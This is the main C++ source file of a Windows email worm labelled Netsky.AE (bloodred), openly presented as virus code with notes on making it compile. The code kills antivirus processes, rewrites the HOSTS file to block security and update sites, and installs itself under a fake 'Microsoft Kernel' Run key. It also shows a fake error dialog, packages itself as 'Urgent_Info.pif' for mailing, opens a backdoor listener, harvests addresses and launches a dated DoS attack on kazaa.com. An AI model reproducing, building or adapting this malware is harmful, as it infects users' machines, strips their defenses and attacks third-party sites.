main.cpp

1. /**************************************************
2. *            Netsky.AE(bloodred)
3. *
4. *   Project History:
5. *        Main idea - November 2003
6. *        Initial design - December 2003
7. *        First half of virus completed - February 2004
8. *        Retrieved project source code; import to GIT repo;
9. *        added Linux env build Makefile; added missing libs
10. *        (advapi32, user32, shell32) to allow compilation;
11. *        see GIT history for any (possible?) future changes.
12. *
13. */
14.  
15. #define WIN32_LEAN_AND_MEAN
16.  
17. #include <windows.h>
18. #include <winsock.h>
19. #include "backdoor.h"
20. #include "KillProc.h"
21. #include "Harvester.h"
22. #include "ZipIt.h"
23. #include "Base64.h"
24. #include "DOS.h"
25. #include <stdio.h>
26.  
27. #pragma comment (lib,"ws2_32.lib")
28. #pragma comment (lib,"AdvAPI32.Lib")
29. #pragma comment (lib,"User32.Lib")
30. #pragma comment (lib,"Shell32.Lib")
31.  
32.  
33.  
34. //message that is compiled into exe
35. static const char *szMsg[] = {
36.        
37.         "Live life as it is or live life as it comes. "
38.             "Written by Jackhole"
39.            
40.            
41.     };
42. //kill all netsky and sasser variants
43. void kill_skynet()
44. {
45.     CreateMutexA(NULL, TRUE, "AdmMoodownJKIS003");
46.     CreateMutexA(NULL, TRUE, "(S)(k)(y)(N)(e)(t)");
47.     CreateMutexA(NULL, TRUE, "____--->>>>U<<<<--____");
48.     CreateMutexA(NULL, TRUE, "NetDy_Mutex_Psycho");
49.     CreateMutexA(NULL, TRUE, "_-=oOOSOkOyONOeOtOo=-_");
50.     CreateMutexA(NULL, TRUE, "SyncMutex_USUkUyUnUeUtUU");
51.     CreateMutexA(NULL, TRUE, "SyncMutex_USUkUyUnUeUtU");
52.     CreateMutexA(NULL, TRUE, "Protect_USUkUyUnUeUtU_Mutex");
53.     CreateMutexA(NULL, TRUE, "89845848594808308439858307378280987074387498739847");
54.     CreateMutexA(NULL, TRUE, "_-oOaxX|-+S+-+k+-+y+-+N+-+e+-+t+-|XxKOo-_");
55.     CreateMutexA(NULL, TRUE, "_-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_");
56.     CreateMutexA(NULL, TRUE, "Bgl_*L*o*o*s*e*");
57.     CreateMutexA(NULL, TRUE, "NetDy_Mutex_Psycho");
58.     CreateMutexA(NULL, TRUE, "Rabbo_Mutex");
59.     CreateMutexA(NULL, TRUE, "Rabbo");
60.     CreateMutexA(NULL, TRUE, "SkYnEt_AVP");
61.     CreateMutexA(NULL, TRUE, "KO[SkyNet.cz]SystemsMutex");
62.     CreateMutexA(NULL, TRUE, "MI[SkyNet.cz]SystemsMutex");
63.     CreateMutexA(NULL, TRUE, "Netsky AV Guard");
64.     CreateMutexA(NULL, TRUE, "LK[SkyNet.cz]SystemsMutex");
65.     CreateMutexA(NULL, TRUE, "[SkyNet.cz]SystemsMutex");
66.     CreateMutexA(NULL, TRUE, "AdmSkynetJKIS003");
67. CreateMutexA(NULL, TRUE, "SkyNet-Sasser");
68.     CreateMutexA(NULL, TRUE, "S-k-y-n-e-t--A-n-t-i-v-i-r-u-s-T-e-a-m");
69. CreateMutexA(NULL, TRUE, "MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D");
70. CreateMutexA(NULL, TRUE, "Jobaka3");
71. CreateMutexA(NULL, TRUE, "Jobaka3l");
72. CreateMutexA(NULL, TRUE, "JumpallsNlsTillt");
73. CreateMutexA(NULL, TRUE, "SkynetSasserVersionWithPingFast");
74. CreateMutexA(NULL, TRUE, "SkynetNotice");
75. CreateMutexA(NULL, TRUE, "'D'r'o'p'p'e'd'S'k'y'N'e't'");
76.  
77. }
78.  
79.  
80. //overwrite localhost file
81. void host(void)
82. {
83.    
84. char host[MAX_PATH];
85.  
86. GetSystemDirectory(host, sizeof(host));
87.  
88. strcat(host, "\\Drivers\\ETC\\HOSTS");
89.  
90.     const char* buffer = "127.0.0.1 www.norton.com 127.0.0.1 norton.com 127.0.0.1 yahoo.com 127.0.0.1 www.yahoo.com 127.0.0.1 microsoft.com 127.0.0.1 www.microsoft.com 127.0.0.1 windowsupdate.com 127.0.0.1 www.windowsupdate.com 127.0.0.1 www.mcafee.com 127.0.0.1 mcafee.com 127.0.0.1 www.nai.com 127.0.0.1 nai.com 127.0.0.1 www.ca.com 127.0.0.1 ca.com 127.0.0.1 liveupdate.symantec.com 127.0.0.1 www.sophos.com 127.0.0.1 www.google.com 127.0.0.1 google.com";
91.  
92.  
93.  
94. DWORD byte;
95. HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
96. BOOL bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL);
97. CloseHandle(hFile);
98.      
99.      
100. }
101.  
102.  
103. void bldred_install()
104. {
105.     char pathname[256];
106. char windir[MAX_PATH];
107. char bldred_instpath[MAX_PATH];
108.  
109. GetSystemDirectory(windir, sizeof(windir));
110. HMODULE hMe = GetModuleHandle(NULL);
111. DWORD nRet = GetModuleFileName(hMe, pathname, 256);
112.  
113. strcat(windir, "\\Windows_kernel32.exe");
114. CopyFile(pathname,windir,0);
115.  
116. lstrcpy(bldred_instpath,windir);
117.  
118. char buffer[60];
119. unsigned long size = sizeof(buffer);
120. strcpy(buffer, bldred_instpath);
121. HKEY software;
122. HKEY mykey;
123. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\",&software);
124. RegCreateKey(software,"Run",&mykey);
125. RegSetValueEx(mykey,"Microsoft Kernel",NULL,REG_SZ,(LPBYTE)buffer,size);
126. RegCloseKey(mykey);
127. RegCloseKey(software);
128.    
129. }
130.  
131.  
132. int bldred_mutex()
133. {
134.     CreateMutexA(NULL, TRUE, "~~~Bloodred~~~owns~~~you~~~xoxo~~~2004");
135. if (GetLastError() == ERROR_ALREADY_EXISTS)
136. ExitProcess(0);
137. return 0;
138. }
139. //display fake error message only once. If it can't find frun.txt then thats when it displays the message
140. void msg()
141. {
142.  
143.     char host[MAX_PATH];
144. GetSystemDirectory(host, sizeof(host));
145. strcat(host, "\\frun.txt");
146. FILE* fin;
147.         fin = fopen(host,"rb");
148.     if (fin==NULL)
149. MessageBox(NULL,"Windows encountered an error reading the file","Error",MB_OK|MB_ICONERROR);
150.     const char* buffer = "Here's Johnny :)"; //just a message within frun.txt
151.     DWORD byte;
152. HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
153. BOOL bSuccess = WriteFile (hFile, buffer, strlen(buffer), &byte, NULL);
154. CloseHandle(hFile);
155.  
156. }
157. void bldred_mail_install()
158. {
159.  
160.     char systemdir[100];
161.     char systemdir2[100];
162.     char systemdir3[100];
163.  
164.     GetSystemDirectory(systemdir,sizeof(systemdir));
165.     GetSystemDirectory(systemdir2,sizeof(systemdir2));
166.     GetSystemDirectory(systemdir3,sizeof(systemdir3));
167.     strcat(systemdir,"\\bloodred.exe");
168.     strcat(systemdir2,"\\base64zip.sys");
169.     strcat(systemdir3,"\\base64exe.sys");
170.     char buf3[260];
171.     char windir[260];
172.     GetWindowsDirectory(windir,sizeof(windir));
173.     GetModuleFileName(NULL,buf3,MAX_PATH);
174. CopyFile(buf3,systemdir,0);
175. strcat(windir,"\\bloodred.zip");
176. zip_store(buf3,windir,"Urgent_Info.pif");
177. EncodeBase64(windir,systemdir2);
178. EncodeBase64(windir,systemdir3);
179. }
180.  
181. //if it's past october 11th 2004 perform the DOS attack against kazaa.com, those damn
182. // spyware writers.
183. int chk_dos_date()
184. {
185.     static const SYSTEMTIME termdate = { 2004,10,0,11,   16,38,43 };
186.     FILETIME ftime_c, ftime_f;
187.     GetSystemTimeAsFileTime(&ftime_c);
188.     SystemTimeToFileTime(&termdate, &ftime_f);
189.     if (ftime_c.dwHighDateTime > ftime_f.dwHighDateTime) return 1;
190.     if (ftime_c.dwHighDateTime < ftime_f.dwHighDateTime) return 0;
191.     if (ftime_c.dwLowDateTime > ftime_f.dwLowDateTime) return 1;
192.     return 0;
193. }
194.  
195.  
196. void bldred_main()
197.  
198. {
199.  
200.  DWORD pl;
201.  DWORD tid;
202.  
203.     endAvSoft();
204.     //if the date is passed the 11th create the dos attack thread
205.     if(chk_dos_date()) CreateThread(0, 0, DOSATTACK, NULL, 0, &tid);
206.     bldred_mail_install();
207.  bldred_mutex();
208.     CreateThread(0, 0, listening, NULL, 0, &pl);
209.     msg();
210.         kill_skynet();
211.     bldred_install();
212.    host();
213. harvest_main();
214.  
215. }
216.  
217. //VIRUS ENTRY POINT. WITHOUT THIS, THE VIRUS WON'T RUN, DUH!
218. int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
219. {
220. //startup: Windows Socket Library
221.     WSADATA data;  
222.     WSAStartup(MAKEWORD(2,0), &data);
223.     bldred_main();
224. }
225.